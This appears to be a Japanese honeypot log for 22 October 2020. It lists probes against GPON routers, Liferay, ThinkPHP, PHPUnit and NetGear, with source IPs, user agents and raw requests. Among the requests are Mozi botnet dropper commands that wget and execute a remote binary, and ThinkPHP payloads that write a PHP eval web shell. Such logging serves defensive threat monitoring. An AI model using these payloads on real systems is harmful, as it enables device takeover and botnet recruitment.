ハニーポット(仮) 観測記録 2020/10/22分です。
特徴
Location:JP
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//123[.]97[.]240[.]114:40730/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Polycom PBX製品へのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:58 (前日比:+32)
US:総アクセス数:24 (前日比:-219)
UK:総アクセス数:30 (前日比:+6)
SG:総アクセス数:45 (前日比:+20)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 42.224.190.254 | China |
10 | 49.233.148.122 | China |
1 | 79.22.224.39 | Italy |
1 | 80.82.65.80 | Netherlands |
1 | 94.232.41.116 | Russia |
1 | 100.8.85.4 | United States |
1 | 101.108.141.88 | Thailand |
1 | 113.220.26.74 | China |
1 | 118.113.5.212 | China |
19 | 119.188.240.46 | China |
1 | 172.105.77.209 | United States |
1 | 173.77.212.170 | United States |
12 | 176.113.115.89 | Russia |
1 | 185.39.11.105 | Switzerland |
1 | 185.202.2.68 | Russia |
2 | 188.166.242.78 | Netherlands |
1 | 188.169.45.89 | Georgia |
1 | 192.241.236.248 | United States |
1 | 211.47.99.228 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
4 | ApiTool |
1 | Go-http-client/1.1 |
1 | Hello, World |
1 | Hello, world |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
19 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
1 | GET | ../../proc/ | HTTP |
2 | GET | /.env | HTTP/1.1 |
1 | GET | ///shell.php | HTTP/1.1 |
1 | GET | //console/login/LoginForm.jsp | HTTP/1.1 |
1 | GET | //dede/tpl.php | HTTP/1.1 |
1 | GET | //index.php | HTTP/1.1 |
1 | GET | //index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=shell.php&vars%5B1%5D%5B%5D=%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22 | HTTP/1.1 |
1 | GET | //index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CRequest/input&filter=phpinfo&data=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CRequest/input&filter=system&data=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=shell.php&content=%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22 | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&content=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //login.action | HTTP/1.1 |
1 | GET | //public/index.php | HTTP/1.1 |
1 | GET | //showAnouncement.action | HTTP/1.1 |
1 | GET | //showcase.action | HTTP/1.1 |
1 | GET | //upload.action | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | POST | //index.php/?s=captcha | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
4 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.68.184.28 | United States |
1 | 27.202.13.30 | China |
3 | 51.158.78.179 | France |
1 | 59.99.95.34 | India |
1 | 61.219.11.153 | Taiwan |
1 | 70.25.65.211 | Canada |
1 | 100.2.48.232 | United States |
1 | 112.252.237.30 | China |
1 | 117.213.43.12 | India |
3 | 163.172.159.134 | United Kingdom |
6 | 176.113.115.89 | Russia |
1 | 187.163.171.58 | Mexico |
1 | 192.241.237.240 | United States |
2 | 194.59.249.20 | Romania |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
3 | ApiTool |
1 | Hello, World |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:54.0) Gecko/20100101 Firefox/54.0 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
2 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
3 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]202[.]13[.]30:60401/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
3 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | http[:]//ritarudnicki[.]site/08ec92b77e089889063547cddc0f940a8611db7f5ac11c54e4391ea88f0c6ec153f00d915cc9fb31c2900b59f7fcfa6fd3b9ef47eb39797cd5ad76ade54ce04306984db92c714201d45f05d4b50479cef14147eb4b233b45cedb2d9fa0b7cdd4 | HTTP/1.1 |
1 | POST | http[:]//withthis[.]site/c8837a5e3b2fa25f3a22ce79d7f904b2da53ae1f7f9bd5ea55dcd98dde94e2b727da93e5d1665e8b143ad45d0f0e72ee6524ee4f9ca418598ffc39b0d747601c33331cc450438815c11b98550ee7542a34ce32a97ffb5c38bd3f144b9647ce76 | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 20.55.40.142 | United States |
1 | 23.90.145.36 | United States |
1 | 59.99.40.27 | India |
1 | 61.219.11.153 | Taiwan |
1 | 74.102.39.43 | United States |
1 | 88.247.99.152 | Turkey |
1 | 123.97.240.114 | China |
1 | 172.105.77.209 | United States |
8 | 176.113.115.89 | Russia |
2 | 185.39.11.105 | Switzerland |
8 | 192.236.177.74 | United States |
1 | 192.241.232.250 | United States |
1 | 201.110.212.231 | Mexico |
1 | 219.155.86.31 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
4 | ApiTool |
2 | Hello, World |
1 | Hello, world |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | \x16\x03\x01 | ||
2 | \x16\x03\x03 | ||
1 | GET | //PMA/scripts/setup.php | HTTP/1.1 |
1 | GET | //admin/scripts/setup.php | HTTP/1.1 |
1 | GET | //dbadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //mysql/scripts/setup.php | HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //webdav/wickd.php | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /muieblackcat | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]97[.]240[.]114:40730/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
4 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 1.176.188.175 | South Korea |
1 | 13.68.184.28 | United States |
2 | 20.39.241.27 | United States |
1 | 27.213.198.243 | China |
1 | 60.253.50.5 | South Korea |
1 | 61.156.111.115 | China |
1 | 61.219.11.153 | Taiwan |
1 | 80.82.65.80 | Netherlands |
1 | 94.232.41.116 | Russia |
1 | 100.8.85.4 | United States |
1 | 116.88.128.116 | Singapore |
1 | 123.129.48.32 | China |
1 | 172.105.77.209 | United States |
1 | 176.58.115.180 | United Kingdom |
11 | 176.113.115.89 | Russia |
2 | 184.105.181.14 | United States |
2 | 185.39.11.105 | Switzerland |
1 | 187.133.97.178 | Mexico |
1 | 192.241.206.15 | United States |
1 | 202.83.45.206 | India |
10 | 202.120.184.75 | China |
1 | 202.164.138.27 | India |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
7 | ApiTool |
1 | Go-http-client/1.1 |
2 | Hello, World |
1 | Hello, world |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | \x03 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | GET | ../../proc/ | HTTP |
3 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
1 | GET | /cfg/000000000000.cfg | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /pv/000000000000.cfg | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]129[.]48[.]32:54219/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
7 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf |